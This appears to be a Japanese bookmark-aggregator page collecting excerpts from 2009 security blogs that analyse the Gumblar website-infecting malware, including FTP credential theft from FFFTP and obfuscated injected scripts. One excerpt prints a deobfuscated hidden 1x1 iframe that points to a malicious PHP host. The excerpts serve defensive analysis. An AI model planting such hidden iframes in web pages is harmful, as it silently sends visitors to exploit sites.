今日話題になった Gumblar の亜種によって FFFTP の設定情報から FTP 情報が漏れる件で、FTP 自体の危険性と FFFTP 自体の特性、さらに Gumblar 対策という点で少し情報が混乱している状況が見受けられます。そこでその点を簡単にまとめてみました。 去年あたりから、「Gumblar (ガンブラー)」 に代表されるような、FTP のアカウント情報を何らかの手段で盗み出して Web サーバにアクセスし、Web サイトを改竄して被害を広めていくタイプのウィルスが問題になっていますが、今日になって広く利用されているフリーの FTP クライアントである 「FFFTP」 にアカウント情報漏洩の危険性が見つかったということで話題になっていました。 「FFFTP」のパスワードが"Gumblar"ウイルスにより抜き取られる問題が発生 : 窓の杜 ただ、この問題で、FTP 自体の危険性
オプション 検出した場合はその部分を表示しない(推奨) チェックしたソースコードを表示(ページにより重くなります) がscriptに含まれるかチェックする(カンマ区切り)
「CODE1」でやられていたサイトが別の難読化コードに置き換えられているとコメントを頂きましたので、丸投げもなんですので難読化の解除だけでもやってみました。 (そしてalert('hoge');を覚えた!そんなレベルの人ですw) www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると <iframe width=1 height=1 border=0 frameborder=0 src='http://sodanthu●com/in6.php'></iframe>
このページで扱っているgumblar.cn(仮称)やzlkonなどのウィルス(マルウェア)は、JavaScriptで作られているため、JavaScriptを無効にしておくのが一番確実です。閲覧者のことを考えて作られたサイトは、たとえJavaScriptを利用していたとしても、JavaScriptを無効にしても閲覧できるようになっています。 しかし、デザイン優先あるいは手抜きでJavaScriptが有効になっていなければ閲覧できないサイトもあります。そのようなサイトは閲覧しないことが安全ですが、どうしても閲覧した場合は十分に気を付けてください。 日頃からOSやブラウザを最新の状態に保った上で、セキュリティソフトを利用する必要があります。JavaScriptにより誘導されるサイトとの通信を遮断するようセキュリティソフトで設定しておくのも良いでしょう。 次のブログでは、gumblar.cn感
[2009/11/25 13:45] 2. レジストリのキー・エントリ隠蔽手法の変化の説明に不足があるため補足を追記しました。 5日から6日に取得した二つのGumblarの実行ファイルだけを見て気がついた変化のみを書く。 5月、10月のGumblarから変わってない挙動を勘違いして書いてるかもしれない。 つまり真面目に解析なんてしてないし、ちょっと見て分かる程度のことしか書いてないよってこと。 1. Webページに挿入されたJavaScriptコードの変化 難読化されたコードに僅かな変化がある。 画像の赤線の部分、unescapeからpromptになっているところ。 WebブラウザのJavaScriptインタプリタでは、promptもunescapeも両方実装されているから挙動はいままでと変わらない。 しかし、例えばこのスクリプトの難読化を解くのにPerlのJEモジュールを使っていたとする
有害なスクリプトがいくつかのサイトに注入されています。 単純な1行のscriptタグであること(URIの末尾はphp)、 誘導先は(有害な物が設置されてはいるものの) いわゆる有害ドメインではないことから発覚しにくくなっています。 スクリプトの書き方からzlkon・gumblar・martuzの系統と思われます。 gumblar・martuz 今回 gumblarやmartuzはドメインで容易に蹴られてしまうという欠点がありましたが、 今回はそれがありません(C&Cの存在も確認できません)。 やられちゃったサイト群1のスクリプトは以下のようになっています。 IE用 非IE(Fx、Safari、Opera等)用 デコードするとそれぞれ以下のようになっています。 IE用 非IE用 「s=」でセッション管理をしています(検体を拾えませんでした)。 「id=2」でpdf(Acrobat)が、「id
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
